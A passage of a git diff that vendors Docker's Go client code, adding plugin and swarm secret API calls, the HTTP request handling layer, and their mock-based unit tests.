types.PluginPrivileges, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, "/plugins/pull", query, privileges, headers) +} + +func (cli *Client) checkPluginPermissions(ctx context.Context, query url.Values, options types.PluginInstallOptions) (types.PluginPrivileges, error) { + resp, err := cli.tryPluginPrivileges(ctx, query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + // todo: do inspect before to check existing name before checking privileges + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + ensureReaderClosed(resp) + return nil, privilegeErr + } + options.RegistryAuth = newAuthHeader + resp, err = cli.tryPluginPrivileges(ctx, query, options.RegistryAuth) + } + if err != nil { + ensureReaderClosed(resp) + return nil, err + } + + var privileges types.PluginPrivileges + if err := json.NewDecoder(resp.body).Decode(&privileges); err != nil { + ensureReaderClosed(resp) + return nil, err + } + ensureReaderClosed(resp) + + if !options.AcceptAllPermissions && options.AcceptPermissionsFunc != nil && len(privileges) > 0 { + accept, err := options.AcceptPermissionsFunc(privileges) + if err != nil { + return nil, err + } + if !accept { + return nil, pluginPermissionDenied{options.RemoteRef} + } + } + return privileges, nil +} diff --git a/vendor/github.com/docker/docker/client/plugin_list.go b/vendor/github.com/docker/docker/client/plugin_list.go new file mode 100644 index 0000000000..88c480a3e1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_list.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginList returns the installed plugins +func (cli *Client) PluginList(ctx context.Context) (types.PluginsListResponse, error) { + var plugins types.PluginsListResponse + resp, err := 
cli.get(ctx, "/plugins", nil, nil) + if err != nil { + return plugins, err + } + + err = json.NewDecoder(resp.body).Decode(&plugins) + ensureReaderClosed(resp) + return plugins, err +} diff --git a/vendor/github.com/docker/docker/client/plugin_list_test.go b/vendor/github.com/docker/docker/client/plugin_list_test.go new file mode 100644 index 0000000000..173e4b87f5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_list_test.go @@ -0,0 +1,59 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.PluginList(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginList(t *testing.T) { + expectedURL := "/plugins" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal([]*types.Plugin{ + { + ID: "plugin_id1", + }, + { + ID: "plugin_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + plugins, err := client.PluginList(context.Background()) + if err != nil { + t.Fatal(err) + } + if len(plugins) != 2 { + t.Fatalf("expected 2 plugins, got %v", plugins) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_push.go b/vendor/github.com/docker/docker/client/plugin_push.go new file mode 100644 index 0000000000..1e5f963251 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_push.go @@ 
-0,0 +1,17 @@ +package client + +import ( + "io" + + "golang.org/x/net/context" +) + +// PluginPush pushes a plugin to a registry +func (cli *Client) PluginPush(ctx context.Context, name string, registryAuth string) (io.ReadCloser, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + resp, err := cli.post(ctx, "/plugins/"+name+"/push", nil, nil, headers) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/plugin_push_test.go b/vendor/github.com/docker/docker/client/plugin_push_test.go new file mode 100644 index 0000000000..d9f70cdff8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_push_test.go @@ -0,0 +1,51 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestPluginPushError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.PluginPush(context.Background(), "plugin_name", "") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginPush(t *testing.T) { + expectedURL := "/plugins/plugin_name" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + auth := req.Header.Get("X-Registry-Auth") + if auth != "authtoken" { + return nil, fmt.Errorf("Invalid auth header : expected 'authtoken', got %s", auth) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + _, err := client.PluginPush(context.Background(), "plugin_name", 
"authtoken") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_remove.go b/vendor/github.com/docker/docker/client/plugin_remove.go new file mode 100644 index 0000000000..b017e4d348 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_remove.go @@ -0,0 +1,20 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginRemove removes a plugin +func (cli *Client) PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error { + query := url.Values{} + if options.Force { + query.Set("force", "1") + } + + resp, err := cli.delete(ctx, "/plugins/"+name, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_remove_test.go b/vendor/github.com/docker/docker/client/plugin_remove_test.go new file mode 100644 index 0000000000..a15f1661f6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_remove_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestPluginRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginRemove(context.Background(), "plugin_name", types.PluginRemoveOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginRemove(t *testing.T) { + expectedURL := "/plugins/plugin_name" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected POST method, 
got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginRemove(context.Background(), "plugin_name", types.PluginRemoveOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_set.go b/vendor/github.com/docker/docker/client/plugin_set.go new file mode 100644 index 0000000000..3260d2a90d --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_set.go @@ -0,0 +1,12 @@ +package client + +import ( + "golang.org/x/net/context" +) + +// PluginSet modifies settings for an existing plugin +func (cli *Client) PluginSet(ctx context.Context, name string, args []string) error { + resp, err := cli.post(ctx, "/plugins/"+name+"/set", nil, args, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_set_test.go b/vendor/github.com/docker/docker/client/plugin_set_test.go new file mode 100644 index 0000000000..2450254463 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_set_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestPluginSetError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginSet(context.Background(), "plugin_name", []string{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginSet(t *testing.T) { + expectedURL := "/plugins/plugin_name/set" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, 
fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginSet(context.Background(), "plugin_name", []string{"arg1"}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_upgrade.go b/vendor/github.com/docker/docker/client/plugin_upgrade.go new file mode 100644 index 0000000000..95a4356b97 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_upgrade.go @@ -0,0 +1,37 @@ +package client + +import ( + "fmt" + "io" + "net/url" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// PluginUpgrade upgrades a plugin +func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { + query := url.Values{} + if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + return nil, errors.Wrap(err, "invalid remote reference") + } + query.Set("remote", options.RemoteRef) + + privileges, err := cli.checkPluginPermissions(ctx, query, options) + if err != nil { + return nil, err + } + + resp, err := cli.tryPluginUpgrade(ctx, query, privileges, name, options.RegistryAuth) + if err != nil { + return nil, err + } + return resp.body, nil +} + +func (cli *Client) tryPluginUpgrade(ctx context.Context, query url.Values, privileges types.PluginPrivileges, name, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, fmt.Sprintf("/plugins/%s/upgrade", name), query, privileges, headers) +} diff --git a/vendor/github.com/docker/docker/client/request.go b/vendor/github.com/docker/docker/client/request.go new file mode 100644 index 0000000000..ac05363655 --- /dev/null +++ b/vendor/github.com/docker/docker/client/request.go @@ -0,0 
+1,247 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/url" + "os" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/pkg/errors" + "golang.org/x/net/context" + "golang.org/x/net/context/ctxhttp" +) + +// serverResponse is a wrapper for http API responses. +type serverResponse struct { + body io.ReadCloser + header http.Header + statusCode int +} + +// head sends an http request to the docker API using the method HEAD. +func (cli *Client) head(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "HEAD", path, query, nil, headers) +} + +// getWithContext sends an http request to the docker API using the method GET with a specific go context. +func (cli *Client) get(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "GET", path, query, nil, headers) +} + +// postWithContext sends an http request to the docker API using the method POST with a specific go context. +func (cli *Client) post(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) { + body, headers, err := encodeBody(obj, headers) + if err != nil { + return serverResponse{}, err + } + return cli.sendRequest(ctx, "POST", path, query, body, headers) +} + +func (cli *Client) postRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "POST", path, query, body, headers) +} + +// put sends an http request to the docker API using the method PUT. 
+func (cli *Client) put(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) { + body, headers, err := encodeBody(obj, headers) + if err != nil { + return serverResponse{}, err + } + return cli.sendRequest(ctx, "PUT", path, query, body, headers) +} + +// put sends an http request to the docker API using the method PUT. +func (cli *Client) putRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "PUT", path, query, body, headers) +} + +// delete sends an http request to the docker API using the method DELETE. +func (cli *Client) delete(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "DELETE", path, query, nil, headers) +} + +type headers map[string][]string + +func encodeBody(obj interface{}, headers headers) (io.Reader, headers, error) { + if obj == nil { + return nil, headers, nil + } + + body, err := encodeData(obj) + if err != nil { + return nil, headers, err + } + if headers == nil { + headers = make(map[string][]string) + } + headers["Content-Type"] = []string{"application/json"} + return body, headers, nil +} + +func (cli *Client) buildRequest(method, path string, body io.Reader, headers headers) (*http.Request, error) { + expectedPayload := (method == "POST" || method == "PUT") + if expectedPayload && body == nil { + body = bytes.NewReader([]byte{}) + } + + req, err := http.NewRequest(method, path, body) + if err != nil { + return nil, err + } + req = cli.addHeaders(req, headers) + + if cli.proto == "unix" || cli.proto == "npipe" { + // For local communications, it doesn't matter what the host is. We just + // need a valid and meaningful host name. 
(See #189) + req.Host = "docker" + } + + req.URL.Host = cli.addr + req.URL.Scheme = cli.scheme + + if expectedPayload && req.Header.Get("Content-Type") == "" { + req.Header.Set("Content-Type", "text/plain") + } + return req, nil +} + +func (cli *Client) sendRequest(ctx context.Context, method, path string, query url.Values, body io.Reader, headers headers) (serverResponse, error) { + req, err := cli.buildRequest(method, cli.getAPIPath(path, query), body, headers) + if err != nil { + return serverResponse{}, err + } + return cli.doRequest(ctx, req) +} + +func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResponse, error) { + serverResp := serverResponse{statusCode: -1} + + resp, err := ctxhttp.Do(ctx, cli.client, req) + if err != nil { + if cli.scheme != "https" && strings.Contains(err.Error(), "malformed HTTP response") { + return serverResp, fmt.Errorf("%v.\n* Are you trying to connect to a TLS-enabled daemon without TLS?", err) + } + + if cli.scheme == "https" && strings.Contains(err.Error(), "bad certificate") { + return serverResp, fmt.Errorf("The server probably has client authentication (--tlsverify) enabled. Please check your TLS client certification settings: %v", err) + } + + // Don't decorate context sentinel errors; users may be comparing to + // them directly. 
+ switch err { + case context.Canceled, context.DeadlineExceeded: + return serverResp, err + } + + if nErr, ok := err.(*url.Error); ok { + if nErr, ok := nErr.Err.(*net.OpError); ok { + if os.IsPermission(nErr.Err) { + return serverResp, errors.Wrapf(err, "Got permission denied while trying to connect to the Docker daemon socket at %v", cli.host) + } + } + } + + if err, ok := err.(net.Error); ok { + if err.Timeout() { + return serverResp, ErrorConnectionFailed(cli.host) + } + if !err.Temporary() { + if strings.Contains(err.Error(), "connection refused") || strings.Contains(err.Error(), "dial unix") { + return serverResp, ErrorConnectionFailed(cli.host) + } + } + } + + // Although there's not a strongly typed error for this in go-winio, + // lots of people are using the default configuration for the docker + // daemon on Windows where the daemon is listening on a named pipe + // `//./pipe/docker_engine, and the client must be running elevated. + // Give users a clue rather than the not-overly useful message + // such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.25/info: + // open //./pipe/docker_engine: The system cannot find the file specified.`. + // Note we can't string compare "The system cannot find the file specified" as + // this is localised - for example in French the error would be + // `open //./pipe/docker_engine: Le fichier spécifié est introuvable.` + if strings.Contains(err.Error(), `open //./pipe/docker_engine`) { + err = errors.New(err.Error() + " In the default daemon configuration on Windows, the docker client must be run elevated to connect. 
This error may also indicate that the docker daemon is not running.") + } + + return serverResp, errors.Wrap(err, "error during connect") + } + + if resp != nil { + serverResp.statusCode = resp.StatusCode + } + + if serverResp.statusCode < 200 || serverResp.statusCode >= 400 { + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + return serverResp, err + } + if len(body) == 0 { + return serverResp, fmt.Errorf("Error: request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), req.URL) + } + + var errorMessage string + if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && + resp.Header.Get("Content-Type") == "application/json" { + var errorResponse types.ErrorResponse + if err := json.Unmarshal(body, &errorResponse); err != nil { + return serverResp, fmt.Errorf("Error reading JSON: %v", err) + } + errorMessage = errorResponse.Message + } else { + errorMessage = string(body) + } + + return serverResp, fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage)) + } + + serverResp.body = resp.Body + serverResp.header = resp.Header + return serverResp, nil +} + +func (cli *Client) addHeaders(req *http.Request, headers headers) *http.Request { + // Add CLI Config's HTTP Headers BEFORE we set the Docker headers + // then the user can't change OUR headers + for k, v := range cli.customHTTPHeaders { + if versions.LessThan(cli.version, "1.25") && k == "User-Agent" { + continue + } + req.Header.Set(k, v) + } + + if headers != nil { + for k, v := range headers { + req.Header[k] = v + } + } + return req +} + +func encodeData(data interface{}) (*bytes.Buffer, error) { + params := bytes.NewBuffer(nil) + if data != nil { + if err := json.NewEncoder(params).Encode(data); err != nil { + return nil, err + } + } + return params, nil +} + +func ensureReaderClosed(response serverResponse) { + if body := response.body; body != nil { + // Drain up to 512 bytes 
and close the body to let the Transport reuse the connection + io.CopyN(ioutil.Discard, body, 512) + response.body.Close() + } +} diff --git a/vendor/github.com/docker/docker/client/request_test.go b/vendor/github.com/docker/docker/client/request_test.go new file mode 100644 index 0000000000..63908aec4b --- /dev/null +++ b/vendor/github.com/docker/docker/client/request_test.go @@ -0,0 +1,92 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// TestSetHostHeader should set fake host for local communications, set real host +// for normal communications. +func TestSetHostHeader(t *testing.T) { + testURL := "/test" + testCases := []struct { + host string + expectedHost string + expectedURLHost string + }{ + { + "unix:///var/run/docker.sock", + "docker", + "/var/run/docker.sock", + }, + { + "npipe:////./pipe/docker_engine", + "docker", + "//./pipe/docker_engine", + }, + { + "tcp://0.0.0.0:4243", + "", + "0.0.0.0:4243", + }, + { + "tcp://localhost:4243", + "", + "localhost:4243", + }, + } + + for c, test := range testCases { + proto, addr, basePath, err := ParseHost(test.host) + if err != nil { + t.Fatal(err) + } + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, testURL) { + return nil, fmt.Errorf("Test Case #%d: Expected URL %q, got %q", c, testURL, req.URL) + } + if req.Host != test.expectedHost { + return nil, fmt.Errorf("Test Case #%d: Expected host %q, got %q", c, test.expectedHost, req.Host) + } + if req.URL.Host != test.expectedURLHost { + return nil, fmt.Errorf("Test Case #%d: Expected URL host %q, got %q", c, test.expectedURLHost, req.URL.Host) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(([]byte("")))), + }, nil + }), + + proto: proto, + addr: addr, + basePath: basePath, + } + + _, err = 
client.sendRequest(context.Background(), "GET", testURL, nil, nil, nil) + if err != nil { + t.Fatal(err) + } + } +} + +// TestPlainTextError tests the server returning an error in plain text for +// backwards compatibility with API versions <1.24. All other tests use +// errors returned as JSON +func TestPlainTextError(t *testing.T) { + client := &Client{ + client: newMockClient(plainTextErrorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerList(context.Background(), types.ContainerListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_create.go b/vendor/github.com/docker/docker/client/secret_create.go new file mode 100644 index 0000000000..de8b041567 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_create.go @@ -0,0 +1,24 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretCreate creates a new Secret. 
+func (cli *Client) SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) { + var headers map[string][]string + + var response types.SecretCreateResponse + resp, err := cli.post(ctx, "/secrets/create", nil, secret, headers) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/secret_create_test.go b/vendor/github.com/docker/docker/client/secret_create_test.go new file mode 100644 index 0000000000..cb378c77ff --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_create_test.go @@ -0,0 +1,57 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSecretCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretCreate(t *testing.T) { + expectedURL := "/secrets/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + b, err := json.Marshal(types.SecretCreateResponse{ + ID: "test_secret", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusCreated, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := 
client.SecretCreate(context.Background(), swarm.SecretSpec{}) + if err != nil { + t.Fatal(err) + } + if r.ID != "test_secret" { + t.Fatalf("expected `test_secret`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_inspect.go b/vendor/github.com/docker/docker/client/secret_inspect.go new file mode 100644 index 0000000000..f774576118 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_inspect.go @@ -0,0 +1,34 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretInspectWithRaw returns the secret information with raw data +func (cli *Client) SecretInspectWithRaw(ctx context.Context, id string) (swarm.Secret, []byte, error) { + resp, err := cli.get(ctx, "/secrets/"+id, nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return swarm.Secret{}, nil, secretNotFoundError{id} + } + return swarm.Secret{}, nil, err + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return swarm.Secret{}, nil, err + } + + var secret swarm.Secret + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&secret) + + return secret, body, err +} diff --git a/vendor/github.com/docker/docker/client/secret_inspect_test.go b/vendor/github.com/docker/docker/client/secret_inspect_test.go new file mode 100644 index 0000000000..423d986968 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_inspect_test.go @@ -0,0 +1,65 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSecretInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.SecretInspectWithRaw(context.Background(), "nothing") + 
if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretInspectSecretNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.SecretInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrSecretNotFound(err) { + t.Fatalf("expected an secretNotFoundError error, got %v", err) + } +} + +func TestSecretInspect(t *testing.T) { + expectedURL := "/secrets/secret_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Secret{ + ID: "secret_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + secretInspect, _, err := client.SecretInspectWithRaw(context.Background(), "secret_id") + if err != nil { + t.Fatal(err) + } + if secretInspect.ID != "secret_id" { + t.Fatalf("expected `secret_id`, got %s", secretInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_list.go b/vendor/github.com/docker/docker/client/secret_list.go new file mode 100644 index 0000000000..7e9d5ec167 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_list.go @@ -0,0 +1,35 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretList returns the list of secrets. 
+func (cli *Client) SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/secrets", query, nil) + if err != nil { + return nil, err + } + + var secrets []swarm.Secret + err = json.NewDecoder(resp.body).Decode(&secrets) + ensureReaderClosed(resp) + return secrets, err +} diff --git a/vendor/github.com/docker/docker/client/secret_list_test.go b/vendor/github.com/docker/docker/client/secret_list_test.go new file mode 100644 index 0000000000..1ac11cddb3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSecretListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SecretList(context.Background(), types.SecretListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretList(t *testing.T) { + expectedURL := "/secrets" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.SecretListOptions + expectedQueryParams map[string]string + }{ + { + options: types.SecretListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.SecretListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": 
`{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Secret{ + { + ID: "secret_id1", + }, + { + ID: "secret_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + secrets, err := client.SecretList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(secrets) != 2 { + t.Fatalf("expected 2 secrets, got %v", secrets) + } + } +} diff --git a/vendor/github.com/docker/docker/client/secret_remove.go b/vendor/github.com/docker/docker/client/secret_remove.go new file mode 100644 index 0000000000..1955b988a9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_remove.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// SecretRemove removes a Secret. 
+func (cli *Client) SecretRemove(ctx context.Context, id string) error { + resp, err := cli.delete(ctx, "/secrets/"+id, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/secret_remove_test.go b/vendor/github.com/docker/docker/client/secret_remove_test.go new file mode 100644 index 0000000000..f269f787d2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestSecretRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SecretRemove(context.Background(), "secret_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretRemove(t *testing.T) { + expectedURL := "/secrets/secret_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.SecretRemove(context.Background(), "secret_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_update.go b/vendor/github.com/docker/docker/client/secret_update.go new file mode 100644 index 0000000000..b94e24aab0 --- /dev/null +++ 